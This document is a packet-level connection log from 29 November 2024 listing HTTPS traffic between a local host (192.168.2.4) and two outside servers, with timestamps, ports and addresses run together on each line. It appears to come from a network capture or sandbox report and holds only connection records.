                                                                                                                                      Nov 29, 2024 23:10:59.168960094 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.168975115 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.169044018 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.169051886 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.169092894 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.170552969 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.170602083 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.170667887 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.171299934 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.171310902 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.201570988 CET49781443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.201577902 CET49780443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.201602936 CET4434978013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.201668978 CET4434978113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.201745987 CET49780443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.201961994 CET49780443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.201970100 CET49781443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.201972961 CET4434978013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.202064991 CET49781443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.202102900 CET4434978113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.203161001 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.203169107 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.203227997 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.203639984 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.203649998 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.204813004 CET49783443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.204837084 CET4434978313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.204906940 CET49783443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.205019951 CET49783443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.205046892 CET4434978313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.205512047 CET49784443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.205542088 CET4434978413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.205734015 CET49784443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.206001997 CET49784443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.206013918 CET4434978413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.322349072 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.322369099 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.322387934 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.322433949 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:59.322451115 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.322469950 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:59.322488070 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:59.359332085 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.359368086 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.359411001 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.359416008 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:59.359458923 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:59.359523058 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:59.359535933 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.359549999 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:59.359555006 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:00.923600912 CET4434978113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:00.924658060 CET49781443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:00.924756050 CET4434978113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:00.925129890 CET49781443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:00.925148010 CET4434978113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:00.943037987 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:00.943365097 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:00.943386078 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:00.943742990 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:00.943753958 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.000787020 CET4434978013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.001111984 CET49780443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.001127958 CET4434978013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.001487970 CET49780443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.001497030 CET4434978013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.003191948 CET4434978313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.003515959 CET49783443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.003552914 CET4434978313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.003897905 CET49783443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.003910065 CET4434978313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.358750105 CET4434978113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.358795881 CET4434978113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.358942032 CET49781443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.359188080 CET49781443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.359188080 CET49781443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.359229088 CET4434978113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.359253883 CET4434978113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.362538099 CET49785443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.362574100 CET4434978513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.362642050 CET49785443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.362767935 CET49785443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.362782955 CET4434978513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.384800911 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.384820938 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.384874105 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.384885073 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.385018110 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.385059118 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.385063887 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.385078907 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.385205030 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.385235071 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.385277033 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.387032986 CET49786443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.387063026 CET4434978613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.387129068 CET49786443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.387231112 CET49786443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.387243032 CET4434978613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.399844885 CET4434978413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.400161982 CET49784443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.400175095 CET4434978413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.902775049 CET4434979513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.903264046 CET49795443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.903268099 CET4434979513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.967106104 CET4434979413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.967154026 CET4434979413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.967199087 CET49794443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.967367887 CET49794443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.967367887 CET49794443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.967377901 CET4434979413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.967386007 CET4434979413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.969620943 CET49797443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.969649076 CET4434979713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.969744921 CET49797443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.969907999 CET49797443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.969919920 CET4434979713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.981126070 CET4434979213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.981175900 CET4434979213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.981221914 CET49792443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.981509924 CET49792443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.981515884 CET4434979213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.981523991 CET49792443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.981530905 CET4434979213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.983352900 CET49798443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.983370066 CET4434979813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.983438015 CET49798443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.983558893 CET49798443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.983568907 CET4434979813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.006962061 CET4434979313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.007003069 CET4434979313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.007064104 CET49793443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.007189035 CET49793443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.007204056 CET4434979313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.007213116 CET49793443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.007217884 CET4434979313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.009182930 CET49799443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.009195089 CET4434979913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.009268045 CET49799443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.009397030 CET49799443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.009409904 CET4434979913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.355931044 CET4434979513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.355973959 CET4434979513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.356126070 CET49795443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.356205940 CET49795443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.356220007 CET4434979513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.356228113 CET49795443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.356231928 CET4434979513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.358725071 CET49800443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.358757019 CET4434980013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.358824015 CET49800443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.358989000 CET49800443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.358999014 CET4434980013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:07.755026102 CET4434979713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:07.755572081 CET49797443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:07.755593061 CET4434979713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:07.755930901 CET49797443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:07.755935907 CET4434979713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:07.762708902 CET4434979813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:07.762995005 CET49798443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:07.763005972 CET4434979813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:07.763381004 CET49798443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:07.763385057 CET4434979813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:07.864937067 CET4434979913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:07.865365028 CET49799443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:07.865385056 CET4434979913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:07.865791082 CET49799443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:07.865796089 CET4434979913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.204102039 CET4434980013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.204607010 CET49800443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.204627037 CET4434980013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.205028057 CET49800443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.205032110 CET4434980013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.207386971 CET4434979813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.207432032 CET4434979813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.207482100 CET49798443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.207689047 CET49798443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.207698107 CET4434979813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.207707882 CET49798443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.207711935 CET4434979813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.207998991 CET4434979713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.208061934 CET4434979713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.208117962 CET49797443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.208686113 CET49797443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.208705902 CET4434979713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.208715916 CET49797443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.208724022 CET4434979713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.211041927 CET49801443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.211066961 CET4434980113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.211142063 CET49801443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.211427927 CET49801443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.211440086 CET4434980113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.212380886 CET49802443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.212398052 CET4434980213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.212455034 CET49802443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.212558985 CET49802443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.212573051 CET4434980213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.318432093 CET4434979913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.318483114 CET4434979913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.318523884 CET49799443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.318625927 CET49799443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.318633080 CET4434979913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.318639994 CET49799443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.318643093 CET4434979913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.320563078 CET49803443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.320581913 CET4434980313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.320651054 CET49803443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.320785046 CET49803443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.320795059 CET4434980313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.657949924 CET4434980013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.658005953 CET4434980013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.658060074 CET49800443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.658236980 CET49800443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.658245087 CET4434980013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.658255100 CET49800443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.658260107 CET4434980013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.661067009 CET49804443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.661089897 CET4434980413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.661170959 CET49804443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.661329985 CET49804443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.661339998 CET4434980413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:09.927279949 CET4434980213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:09.927807093 CET49802443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:09.927834988 CET4434980213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:09.928253889 CET49802443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:09.928258896 CET4434980213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.165812016 CET4434980313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.166330099 CET49803443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.166351080 CET4434980313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.166753054 CET49803443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.166758060 CET4434980313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.362925053 CET4434980213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.363002062 CET4434980213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.363056898 CET49802443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.363212109 CET49802443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.363223076 CET4434980213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.363230944 CET49802443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.363234997 CET4434980213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.365916014 CET49805443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.366004944 CET4434980513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.366095066 CET49805443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:15.972469091 CET4434981213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:16.027446985 CET4434981113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:16.027493000 CET4434981113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:16.027537107 CET49811443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:16.027868986 CET49811443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:16.027878046 CET4434981113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:16.027889013 CET49811443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:16.027892113 CET4434981113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:16.032337904 CET49816443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:16.032391071 CET4434981613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:16.032449007 CET49816443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:16.032768011 CET49816443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:16.032783985 CET4434981613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:16.415442944 CET4434981213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:16.415486097 CET4434981213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:16.415565014 CET49812443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:16.415735960 CET49812443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:16.415776014 CET4434981213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:16.415802002 CET49812443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:16.415818930 CET4434981213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:16.418200970 CET49817443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:16.418231010 CET4434981713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:16.418332100 CET49817443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:16.418462038 CET49817443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:16.418473005 CET4434981713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:16.681087971 CET4434981313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:16.681484938 CET49813443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:16.681504965 CET4434981313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:16.681957006 CET49813443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:16.681962967 CET4434981313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:16.923979998 CET4434981413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:16.924519062 CET49814443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:16.924550056 CET4434981413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:16.924952030 CET49814443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:16.924964905 CET4434981413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:17.001034021 CET4434981513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:17.001626015 CET49815443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:17.001641035 CET4434981513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:17.001910925 CET49815443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:17.001914024 CET4434981513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:17.116139889 CET4434981313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:17.116204977 CET4434981313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:17.116321087 CET49813443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:17.116457939 CET49813443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:17.116465092 CET4434981313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:17.116480112 CET49813443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:17.116483927 CET4434981313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:17.118870020 CET49818443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:17.118921995 CET4434981813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:17.119009972 CET49818443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:17.119255066 CET49818443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:17.119270086 CET4434981813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:17.368978977 CET4434981413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:17.369029999 CET4434981413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:17.369092941 CET49814443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:17.369256973 CET49814443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:17.369287014 CET4434981413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:17.369313002 CET49814443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:17.369326115 CET4434981413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:17.371983051 CET49819443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:17.372009993 CET4434981913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:17.372095108 CET49819443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:17.372260094 CET49819443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:17.372271061 CET4434981913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:17.446058035 CET4434981513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:17.446110010 CET4434981513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:17.446255922 CET49815443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:17.446342945 CET49815443192.168.2.413.107.246.63
